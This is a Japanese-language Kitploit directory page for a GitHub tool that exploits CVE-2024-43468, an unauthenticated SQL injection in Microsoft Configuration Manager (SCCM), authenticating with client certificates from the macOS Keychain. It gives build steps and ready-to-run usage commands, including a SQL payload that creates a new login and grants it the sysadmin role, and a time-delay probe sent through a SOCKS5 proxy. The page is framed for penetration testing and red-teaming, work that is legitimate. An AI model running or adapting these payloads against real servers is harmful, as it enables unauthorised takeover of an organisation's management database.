Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-43468_mTLS_go — CVE-2024-43468 SCCM SQLインジェクションエクスプロイト(MacOSキーチェーンから抽出不能なmTLSクライアント証明書版) | Kitploit
ツール/GitHubGitHub/nikallass/cve-2024-43468_mtls_go
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証レッドチーミング
GitHubnikallass/cve-2024-43468_mtls_go

CVE-2024-43468_mTLS_go

CVE-2024-43468 SCCM SQLインジェクションエクスプロイト(MacOSキーチェーンから抽出不能なmTLSクライアント証明書版)

リポジトリを見る
321年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-43468 SCCM SQLインジェクションエクスプロイト(MacOSキーチェーン版mTLSクライアント証明書)

macOSキーチェーンを使用してmTLS認証を行うCVE-2024-43468エクスプロイトのGo実装です(キーチェーンからキーをエクスポートする必要はありません)。

さらに:

  • 問題のあるproxychainsを使わずに済むプロキシサポートを追加しました。
  • 証明書のCommon Nameを取得するget_cert_name.pyを追加しました(はい、Keychain Access GUIから手動で行うこともできます)。
  • 何が起こっているかを確認するためのデバッグを大量に追加しました。

以下に基づく:

  • 元のPythonエクスプロイト
  • mTLS Goクライアントの例

説明

Microsoft Configuration Manager(ConfigMgr / SCCM)の未認証SQLインジェクションを悪用し、Management Pointへのネットワークアクセスを持つ攻撃者がサイトデータベース上で任意のSQLクエリを実行できるようにします。

脆弱なバージョン:

  • < 2403 (5.00.9128.1024)
  • < 2309 (5.00.9122.1033)
  • < 2303 (5.00.9106.1037)
  • <= 2211

インストール

root@kitploit:~
# Clone repository
git clone https://github.com/nikallass/CVE-2024-43468_mTLS_go
cd CVE-2024-43468_mTLS_go

# Install dependencies
go get github.com/google/uuid
go get golang.org/x/net/proxy

# Build
go build -o sccm

使い方

root@kitploit:~
# Show help
./sccm -h

# Basic usage (creating new admin)
./sccm -t https://sccm-mp.local \
       -sql "create login user123 with password = 'Password123'; exec master.dbo.sp_addsrvrolemember 'user123', 'sysadmin'" \
       -cn "CertificateCommonName"

# With custom proxy (check with sleep 5)
./sccm -t https://sccm-mp.local \
       -sql "WAITFOR DELAY '0:0:5'" \
       -cn "CertificateCommonName" \
       -proxy "127.0.0.1:9050"

パラメータ

  • -t : ターゲットURL (必須)
  • -sql : 実行するSQLクエリ (必須)
  • -cn : macOSキーチェーン内の証明書Common Name (必須)
  • -proxy : SOCKS5プロキシアドレス (デフォルト: 空)

要件

  • macOS (キーチェーン統合用)
  • Go 1.16+
  • macOSキーチェーン内のクライアント証明書
  • 任意: SOCKS5プロキシ

参考

  • Microsoftアドバイザリ
  • Synacktivアドバイザリ
  • mTLS Goクライアントの例
ツールをダウンロード